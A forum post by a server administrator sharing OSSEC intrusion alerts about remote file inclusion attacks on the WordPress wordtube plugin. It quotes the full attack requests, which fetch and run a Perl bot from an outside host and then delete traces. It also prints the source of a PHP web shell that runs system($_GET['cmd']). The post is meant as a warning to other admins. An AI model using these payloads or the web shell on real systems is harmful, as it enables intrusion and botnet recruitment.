Using Wordpress and its Plugin's

[brainz]

Hi all,

i just wanted to show you all this because i feel i must so the word can be spread and people are aware of what can happen... I'm sorry but i didn't know where to place this post but falko or till you may move this post to the appropriate forum if you like... or remove it completely if you like as well...

firstly and lucky i followed falkos howto on how to install OSSEC HIDS and am so glad that i did i received emails from the server one day they looked like this...

Quote:

OSSEC HIDS Notification.
2007 May 17 05:59:12

Received From: tracs->/var/log/httpd/access_log
Rule: 31106 fired (level 12) -> "A web attack returned code 200 (success)."
Portion of the log(s):

207.58.129.97 - - [17/May/2007:05:59:11 +1000] "GET /wp-login.php?redirect_to=%2F%2Fwp-content%2Fplugins%2Fwordtube%2Fwordtube-button.php%3FwpPATH%3Dhttp%3A%2F%2Fwww.freewebtown .com%2Fmssn%2Fx%2Fcmd2.txt%3F%26cmd%3Dcd%2B%2Ftmp% 3BGET%2Bhttp%3A%2F%2Fwww.freewebtown.com%2Fmssn%2F x%2Fbot.txt%2B%253E%253E%2Bxbot.txt%3Bperl%2Bbot.t xt%3Brm%2B-rf%2Bbot%2A HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"

Quote:

OSSEC HIDS Notification.
2007 May 18 14:17:50

Received From: tracs->/var/log/httpd/access_log
Rule: 31106 fired (level 12) -> "A web attack returned code 200 (success)."
Portion of the log(s):

84.18.204.64 - - [18/May/2007:14:17:50 +1000] "GET /wp-login.php?redirect_to=%2Fwp-content%2Fplugins%2Fwordtube%2Fwordtube-button.php%3FwpPATH%3Dhttp%3A%2F%2Fwww.freewebtown .com%2Fpkspks%2Fcmd.txt%3F%26cmd%3Dcd%2B%2Ftmp%3BG ET%2Bhttp%3A%2F%2Fwww.freewebtown.com%2Fpkspks%2Fb ot.txt%2B%253E%253E%2Bxbot.txt%3Bperl%2Bbot.txt%3B rm%2B-rf%2Bbot%2A HTTP/1.1" 200 2040 "-" "libwww-perl/5.805"

When you look at it, it simply becomes obvious for those that cant see it what it is doing is injecting script into a plugin directory used in wordpress... then GETing some bad scripts and creating a directory executing those scripts and then deleting the folder the scripts are in.

this is what it looks like...

/wp-login.php?redirect_to= wp-content plugins wordtube wordtube-button.php wpPATH http www.freewebtown.com mssn cmd2.txt cmd cd tmp GET http www.freewebtown.com mssn bot.txt bot.txt perl bot.txt rm -rf bot HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"

What i got from this was this...

redirect from /wp-login.php?redirect_to= wp-content/plugins/wordtube/wordtube-button.php
in the wpPATH get www.freewebtown.com/mssn/cmd2.txt
command cd tmp and
GET http www.freewebtown.com/mssn/bot.txt
bot.txt perl
bot.txt rm -rf bot
HTTP/1.1" 200 2055 "-" "libwww-perl/5.805"

So i think going to the plug in folder wordtube and getting cmd2.txt and cmd.txt and bot.txt and creating a directory called bot then executing the files using perl then removing the directory bot and all its content.

now for the content of these files...

cmd.txt or cmd2.txt content is pritty small...


<?php
/*/
/*
/* CMD by : PKS <pks@cabrones.cl>
/* Website :No Avaliable
/*/

Echo "<textarea cols=\"80\" rows=\"20\" readonly>";
system($_GET['cmd']);
die();
?>

http://www.freewebtown.com/pkspks/cmd.txt

This script seems to be creating a textarea thats readonly and then prehaps requesting a system command prompt and then dieing...
i'm not that sure of this part.

now the bot.txt this one is longer i might add it to a zip file, but i'm sure that anyone that looks at this script will know that the script is basically doing...

eg. makes your server join a botnet and uses sendmail to send spam emails opens a and creates its own httpd and sshd and removes logs and tracks and creates user groups and accounts as well you get the picture...

also another script that is injected is a phpshell script...

now i'm wondering what to do.. fully reinstall the server from scratch or try and clean the server out.... somehow...

well this is meant to be just a informational thread just make people aware of the threats out there...

well any type of advise or help would be appreciated..

Just a quick one as well i would be careful when using any plugin's and make use there from a well known and established source well sometimes that wont help either...

regards
brainz